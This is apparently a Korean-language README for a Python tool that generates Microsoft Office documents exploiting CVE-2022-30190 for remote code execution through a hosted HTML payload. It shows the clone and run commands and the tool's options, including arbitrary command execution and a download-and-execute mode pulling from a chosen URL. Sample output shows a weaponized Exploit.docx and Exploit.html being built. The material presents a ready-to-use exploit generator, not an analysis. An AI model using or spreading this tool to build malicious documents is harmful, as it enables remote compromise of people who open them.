
HTML 페이로드를 통해 원격 코드 실행을 위해 CVE-2022-30190을 악용하는 Microsoft Office 문서를 생성하는 Python 스크립트로, 사용자 지정 명령 및 다운로드 후 실행 모드를 지원합니다.
이 스크립트는 Microsoft Office 문서를 생성하여 원격으로 코드를 실행하도록 시도합니다.
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
[--download_url DOWNLOAD_URL]
Generate CVE-2022-30190 Word documents.
optional arguments:
-h, --help show this help message and exit
--html HTML URL to online exploit HTML file
--cmd CMD Command you want to execute on run
--downexec Enable download and execute mode
--download_url DOWNLOAD_URL
Source where to download and execute from
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Starting CVE-2022-30190 Generator...
[•] Created by https://github.com/joshuavanderpoll
[•] Using Word document: Original.docx
[•] Deflating Word document...
[•] Deflated Word document.
[√] Exploited Word document saved in "./builds/Exploit.docx" (1109 bytes).
[√] Exploit HTML file saved in "./builds/Exploit.html" (4241 bytes).